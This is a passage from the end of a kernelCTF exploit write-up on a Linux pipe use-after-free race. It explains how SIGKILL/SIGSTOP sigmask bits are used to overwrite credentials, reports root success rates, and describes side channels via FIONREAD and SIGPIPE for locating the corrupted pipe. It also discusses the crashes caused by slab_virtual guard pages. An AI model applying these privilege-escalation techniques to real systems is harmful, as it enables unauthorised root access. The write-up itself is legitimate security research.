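sigmask = lambda sig: 1 << (sig - 1)

mask = U64                                      # all-ones mask from user space
mask &= ~(sigmask(SIGKILL) | sigmask(SIGSTOP))  # sigdelsetmask()
mask = ~mask & U64                              # signotset()
print(hex(mask))  # 0x40100
```

Only the SIGKILL and SIGSTOP bits survive, so the five most significant bytes of the stored 64-bit sigmask are zero, and those are the bytes used to wipe the credentials.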
Exploit Analysis
This section will be updated as soon as the exploit is published in the Google Security Research repository. If you are interested, keep an eye on PRs.
Additional Notes
In my local environment, I was able to get root privileges 30-40% of the time without crashing the kernel. Here are some insights to improve stability.
The most common crash caused by the exploit occurs when the pipe->rd_wait waitlist is corrupted by the 0x0000 instead of pipe->files.
Since achieving 90% stability with a bug like this can be very challenging, and I was uncertain about winning the race for the LTS slot (spoiler: I was right), I did not focus on the stability aspect. However, I believe that it is possible to identify the corrupted pipe without relying on pipe_read() and pipe_write(), but rather through a side-channel using pipe_ioctl().
When the pipe is freed and the UAF condition occurs, free_pipe_info() will also free pipe->bufs. This will cause the slab obfuscated freelist pointer to overlap with the len and offset fields of one of the pipe buffers. Since we still have access to this pipe, pipe_ioctl() can be utilized to retrieve the number of bytes present in the pipe. If this size is very large, it indicates that we have found the corrupted pipe.
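The probe itself is just an ioctl(FIONREAD) on the pipe fd. A minimal sketch on a regular anonymous pipe (in the exploit, the same ioctl would be issued on every sprayed fifo fd, and an absurdly large count would flag the corrupted pipe):

```python
import fcntl
import os
import termios

def pipe_bytes_ready(fd):
    """ioctl(FIONREAD): number of bytes currently queued in the pipe."""
    buf = bytearray(4)
    fcntl.ioctl(fd, termios.FIONREAD, buf)
    return int.from_bytes(buf, "little")  # assumes a little-endian host

r, w = os.pipe()
os.write(w, b"AAAAA")
print(pipe_bytes_ready(r))  # 5
```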
Another theoretically possible side channel (this is more complex, but fun!) would involve opening the pipes as write-only, so pipe->readers = 0 for all the pipes. When free_pipe_info() frees the pipe, the slab obfuscated freelist pointer overlaps with pipe->nr_accounted and pipe->readers of pipe_inode_info, resulting in a very large pipe->readers value.
By default, an attempt to write to a write-only pipe without any active readers results in a SIGPIPE (which can be handled in user space using sigaction()) at the very beginning of pipe_write(). This means that if we write to all the pipes, we can identify the corrupted one when SIGPIPE is not received.
Although I managed to steal the mitigation instance flag using the same binary, the mitigations had a significant impact on stability. The main problem is caused by slab_virtual guard pages, unmapped space between slabs created when a new slab is allocated (see alloc_slab_meta()):
/*
* [data_range_start, data_range_end) is the virtual address range where
* this slab's objects will be mapped.
* We want alignment appropriate for the order. Note that this could be
* relaxed based on the alignment requirements of the objects being
* allocated, but for now, we behave like the page allocator would.
 */
data_range_start = ALIGN(old_base + slub_virtual_guard_size, alloc_size);
data_range_end = data_range_start + alloc_size;
Sometimes the 0x0000 written out of bounds hits one of these guard pages, leading to an inevitable crash. I could not find a way to bypass this issue, so I chose not to occupy the mitigation instance slot with a non-eligible submission. Here is the crash caused by a guard page:
The slot is still free, so if you can find a solution to this problem and achieve 70% stability, go for it! And if you do, please let me know! :)
Conclusion
This has been quite a journey! If you’ve made it this far, I hope you found this article helpful and learned something new.
This was probably the most fun exploit I’ve worked on, and I learned a lot, particularly about the importance of perseverance in this field.
A huge thanks goes to FizzBuzz101 for all the support, and to 0xTen for providing me with his kernelCTF automatic flag submitter, a program he originally used to win the race for the slot when he exploited a 0-day on Google’s systems.
In the end, despite the exploit working on all instances, I only managed to secure the COS 105 slot. The race for the LTS slot is very hard, and when I targeted 6.6.86, my pwntools script used to deliver the exploit broke badly, resulting in a delayed submission (LOL).
The title of this article is inspired by Four Bytes Of Power by Alex Popov, an article where he explains his journey in exploiting a race condition bug in the vsock subsystem. His article is one of those that sparked my interest in kernel exploitation, so if you haven’t read it yet, you definitely should! In the end, four bytes gave him power, while 0x0000 drove me mad.